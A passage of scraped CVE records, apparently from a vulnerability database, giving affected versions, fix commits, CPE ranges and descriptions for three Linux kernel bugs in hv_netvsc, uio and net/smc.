"lessThan": "bcb7164258d0a9a8aa2e73ddccc2d78f67d2519d",
"status": "affected",
"version": "028aa21f9e92536038cabb834c15d08f5c894382",
"versionType": "git"
},
{
"lessThan": "c7441c77c91e47f653104be8353b44a3366a5366",
"status": "affected",
"version": "997d895fa495fb3421983923219bba93f1a793ee",
"versionType": "git"
},
{
"lessThan": "5b10a88f64c0315cfdef45de0aaaa4eef57de0b7",
"status": "affected",
"version": "ff6c130e48a79c826cbc2427bd8b34a7592460cc",
"versionType": "git"
},
{
"lessThan": "b6d46f306b3964d05055ddaa96b58cd8bd3a472c",
"status": "affected",
"version": "97683466e24c801ee4e865ce90ac7e355db2da59",
"versionType": "git"
},
{
"lessThan": "309ef7de5d840e17607e7d65cbf297c0564433ef",
"status": "affected",
"version": "5dd83db613be8e5c5d30efed7f42780e9eb18380",
"versionType": "git"
},
{
"lessThan": "a71302c8638939c45e4ba5a99ea438185fd3f418",
"status": "affected",
"version": "7350c460f7f48a8653a15c5c90fc9070aaa29535",
"versionType": "git"
},
{
"lessThan": "4d29a58d96a78728cb01ee29ed70dc4bd642f135",
"status": "affected",
"version": "85520856466ed6bc3b1ccb013cddac70ceb437db",
"versionType": "git"
},
{
"lessThan": "9cae43da9867412f8bd09aee5c8a8dc5e8dc3dc2",
"status": "affected",
"version": "85520856466ed6bc3b1ccb013cddac70ceb437db",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/hyperv/netvsc_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "4.19.301",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "5.4.263",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "5.10.203",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "5.15.141",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "6.1.65",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "6.6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhv_netvsc: Register VF in netvsc_probe if NET_DEVICE_REGISTER missed\n\nIf hv_netvsc driver is unloaded and reloaded, the NET_DEVICE_REGISTER\nhandler cannot perform VF register successfully as the register call\nis received before netvsc_probe is finished. This is because we\nregister register_netdevice_notifier() very early( even before\nvmbus_driver_register()).\nTo fix this, we try to register each such matching VF( if it is visible\nas a netdevice) at the end of netvsc_probe."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:17.151Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bcb7164258d0a9a8aa2e73ddccc2d78f67d2519d"
},
{
"url": "https://git.kernel.org/stable/c/c7441c77c91e47f653104be8353b44a3366a5366"
},
{
"url": "https://git.kernel.org/stable/c/5b10a88f64c0315cfdef45de0aaaa4eef57de0b7"
},
{
"url": "https://git.kernel.org/stable/c/b6d46f306b3964d05055ddaa96b58cd8bd3a472c"
},
{
"url": "https://git.kernel.org/stable/c/309ef7de5d840e17607e7d65cbf297c0564433ef"
},
{
"url": "https://git.kernel.org/stable/c/a71302c8638939c45e4ba5a99ea438185fd3f418"
},
{
"url": "https://git.kernel.org/stable/c/4d29a58d96a78728cb01ee29ed70dc4bd642f135"
},
{
"url": "https://git.kernel.org/stable/c/9cae43da9867412f8bd09aee5c8a8dc5e8dc3dc2"
}
],
"title": "hv_netvsc: Register VF in netvsc_probe if NET_DEVICE_REGISTER missed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26820",
"datePublished": "2024-04-17T09:43:47.966Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:17.151Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52439 (GCVE-0-2023-52439)
Vulnerability from cvelistv5
Published
2024-02-20 18:34
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
uio: Fix use-after-free in uio_open
core-1 core-2
-------------------------------------------------------
uio_unregister_device uio_open
idev = idr_find()
device_unregister(&idev->dev)
put_device(&idev->dev)
uio_device_release
get_device(&idev->dev)
kfree(idev)
uio_free_minor(minor)
uio_release
put_device(&idev->dev)
kfree(idev)
-------------------------------------------------------
In the core-1 uio_unregister_device(), the device_unregister will kfree
idev when the idev->dev kobject ref is 1. But after core-1
device_unregister, put_device and before doing kfree, the core-2 may
get_device. Then:
1. After core-1 kfree idev, the core-2 will do use-after-free for idev.
2. When core-2 do uio_release and put_device, the idev will be double
freed.
To address this issue, we can get idev atomic & inc idev reference with
minor_lock.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 57c5f4df0a5a0ee83df799991251e2ee93a5e4e9 Version: 13af019c87f2d90e663742cb1a819834048842ae |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-12-27T16:03:00.894Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3174e0f7de1ba392dc191625da83df02d695b60c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e93da893d52d82d57fc0db2ca566024e0f26ff50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e0be1229ae199ebb90b33102f74a0f22d152570"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cf604ee538ed0c467abe3b4cda5308a6398f0f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17a8519cb359c3b483fb5c7367efa9a8a508bdea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35f102607054faafe78d2a6994b18d5d9d6e92ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/913205930da6213305616ac539447702eaa85e41"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c9ae0b8605078eafc3bea053cc78791e97ba2e2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241227-0006/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52439",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:02:55.773038Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:35.621Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/uio/uio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3174e0f7de1ba392dc191625da83df02d695b60c",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "e93da893d52d82d57fc0db2ca566024e0f26ff50",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "5e0be1229ae199ebb90b33102f74a0f22d152570",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "5cf604ee538ed0c467abe3b4cda5308a6398f0f7",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "17a8519cb359c3b483fb5c7367efa9a8a508bdea",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "35f102607054faafe78d2a6994b18d5d9d6e92ad",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "913205930da6213305616ac539447702eaa85e41",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"lessThan": "0c9ae0b8605078eafc3bea053cc78791e97ba2e2",
"status": "affected",
"version": "57c5f4df0a5a0ee83df799991251e2ee93a5e4e9",
"versionType": "git"
},
{
"status": "affected",
"version": "13af019c87f2d90e663742cb1a819834048842ae",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/uio/uio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.74",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.1",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.74",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.13",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.1",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.100",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nuio: Fix use-after-free in uio_open\n\ncore-1\t\t\t\tcore-2\n-------------------------------------------------------\nuio_unregister_device\t\tuio_open\n\t\t\t\tidev = idr_find()\ndevice_unregister(\u0026idev-\u003edev)\nput_device(\u0026idev-\u003edev)\nuio_device_release\n\t\t\t\tget_device(\u0026idev-\u003edev)\nkfree(idev)\nuio_free_minor(minor)\n\t\t\t\tuio_release\n\t\t\t\tput_device(\u0026idev-\u003edev)\n\t\t\t\tkfree(idev)\n-------------------------------------------------------\n\nIn the core-1 uio_unregister_device(), the device_unregister will kfree\nidev when the idev-\u003edev kobject ref is 1. But after core-1\ndevice_unregister, put_device and before doing kfree, the core-2 may\nget_device. Then:\n1. After core-1 kfree idev, the core-2 will do use-after-free for idev.\n2. When core-2 do uio_release and put_device, the idev will be double\n freed.\n\nTo address this issue, we can get idev atomic \u0026 inc idev reference with\nminor_lock."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:00.841Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3174e0f7de1ba392dc191625da83df02d695b60c"
},
{
"url": "https://git.kernel.org/stable/c/e93da893d52d82d57fc0db2ca566024e0f26ff50"
},
{
"url": "https://git.kernel.org/stable/c/5e0be1229ae199ebb90b33102f74a0f22d152570"
},
{
"url": "https://git.kernel.org/stable/c/5cf604ee538ed0c467abe3b4cda5308a6398f0f7"
},
{
"url": "https://git.kernel.org/stable/c/17a8519cb359c3b483fb5c7367efa9a8a508bdea"
},
{
"url": "https://git.kernel.org/stable/c/35f102607054faafe78d2a6994b18d5d9d6e92ad"
},
{
"url": "https://git.kernel.org/stable/c/913205930da6213305616ac539447702eaa85e41"
},
{
"url": "https://git.kernel.org/stable/c/0c9ae0b8605078eafc3bea053cc78791e97ba2e2"
}
],
"title": "uio: Fix use-after-free in uio_open",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52439",
"datePublished": "2024-02-20T18:34:49.323Z",
"dateReserved": "2024-02-20T12:30:33.291Z",
"dateUpdated": "2025-05-04T12:49:00.841Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35934 (GCVE-0-2024-35934)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/smc: reduce rtnl pressure in smc_pnet_create_pnetids_list()
Many syzbot reports show extreme rtnl pressure, and many of them hint
that smc acquires rtnl in netns creation for no good reason [1]
This patch returns early from smc_pnet_net_init()
if there is no netdevice yet.
I am not even sure why smc_pnet_create_pnetids_list() even exists,
because smc_pnet_netdev_event() is also calling
smc_pnet_add_base_pnetid() when handling NETDEV_UP event.
[1] extract of typical syzbot reports
2 locks held by syz-executor.3/12252:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.4/12253:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.1/12257:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.2/12261:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.0/12265:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.3/12268:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.4/12271:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.1/12274:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
2 locks held by syz-executor.2/12280:
#0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]
#1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.966Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc4d1ebca11b4f194e262326bd45938e857c59d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9117dc783c0ab0a3866812f70e07bf2ea071ac4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7ee3bf0caf599c14db0bf4af7aacd6206ef8a23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2e6bffc0388526ed10406040279a693d62b36ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e920422e7104928f760fc0e12b6d65ab097a2e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/00af2aa93b76b1bade471ad0d0525d4d29ca5cc0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35934",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:40:58.599297Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:15.404Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/smc/smc_pnet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bc4d1ebca11b4f194e262326bd45938e857c59d2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b9117dc783c0ab0a3866812f70e07bf2ea071ac4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d7ee3bf0caf599c14db0bf4af7aacd6206ef8a23",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a2e6bffc0388526ed10406040279a693d62b36ec",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e920422e7104928f760fc0e12b6d65ab097a2e7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "00af2aa93b76b1bade471ad0d0525d4d29ca5cc0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/smc/smc_pnet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: reduce rtnl pressure in smc_pnet_create_pnetids_list()\n\nMany syzbot reports show extreme rtnl pressure, and many of them hint\nthat smc acquires rtnl in netns creation for no good reason [1]\n\nThis patch returns early from smc_pnet_net_init()\nif there is no netdevice yet.\n\nI am not even sure why smc_pnet_create_pnetids_list() even exists,\nbecause smc_pnet_netdev_event() is also calling\nsmc_pnet_add_base_pnetid() when handling NETDEV_UP event.\n\n[1] extract of typical syzbot reports\n\n2 locks held by syz-executor.3/12252:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.4/12253:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks held by syz-executor.1/12257:\n #0: ffffffff8f369610 (pernet_ops_rwsem){++++}-{3:3}, at: copy_net_ns+0x4c7/0x7b0 net/core/net_namespace.c:491\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_create_pnetids_list net/smc/smc_pnet.c:809 [inline]\n #1: ffffffff8f375b88 (rtnl_mutex){+.+.}-{3:3}, at: smc_pnet_net_init+0x10a/0x1e0 net/smc/smc_pnet.c:878\n2 locks 